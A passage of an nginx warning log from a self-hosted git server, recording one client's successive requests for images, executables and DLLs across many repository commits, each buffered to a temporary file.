"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" -2026/02/17 13:42:36 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/10/0000014102 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" -2026/02/17 13:45:36 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/10/0000014103 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -2026/02/17 13:46:18 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/10/0000014104 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" -2026/02/17 13:46:22 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/10/0000014105 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" -2026/02/17 13:46:33 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/10/0000014106 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" -2026/02/17 13:46:36 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/10/0000014107 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" -2026/02/17 13:47:01 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/10/0000014108 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" -2026/02/17 13:47:34 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/10/0000014109 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -2026/02/17 13:47:39 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/11/0000014110 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -2026/02/17 13:47:55 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/11/0000014111 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" -2026/02/17 13:48:24 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/11/0000014112 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" -2026/02/17 13:51:03 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/11/0000014113 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -2026/02/17 13:51:40 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/11/0000014114 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" -2026/02/17 13:52:11 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/11/0000014115 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" -2026/02/17 13:52:18 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/11/0000014116 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" -2026/02/17 13:52:59 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/11/0000014117 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" -2026/02/17 13:53:15 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/11/0000014118 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -2026/02/17 13:54:01 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/11/0000014119 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" -2026/02/17 13:54:27 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/12/0000014120 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" -2026/02/17 13:54:29 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/12/0000014121 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" -2026/02/17 13:54:32 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/12/0000014122 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" -2026/02/17 13:54:40 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/12/0000014123 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" -2026/02/17 13:54:47 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/12/0000014124 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" -2026/02/17 13:54:55 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/12/0000014125 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -2026/02/17 13:55:15 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/12/0000014126 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -2026/02/17 13:55:20 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/12/0000014127 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" -2026/02/17 13:55:27 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/12/0000014128 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" -2026/02/17 13:55:33 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/12/0000014129 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" -2026/02/17 13:55:41 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/13/0000014130 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" -2026/02/17 13:55:48 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/13/0000014131 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" -2026/02/17 13:55:57 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/13/0000014132 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" -2026/02/17 13:56:05 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/13/0000014133 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" -2026/02/17 13:56:07 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/13/0000014134 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" -2026/02/17 13:56:13 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/13/0000014135 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom6.png" -2026/02/17 13:56:19 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/13/0000014136 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" -2026/02/17 13:56:27 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/13/0000014137 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" -2026/02/17 13:56:34 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/13/0000014138 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom1.png" -2026/02/17 13:56:41 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/13/0000014139 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom1.png" -2026/02/17 13:56:47 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/14/0000014140 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" -2026/02/17 13:56:55 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/14/0000014141 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" -2026/02/17 13:57:01 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/14/0000014142 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -2026/02/17 13:57:03 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/14/0000014143 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET 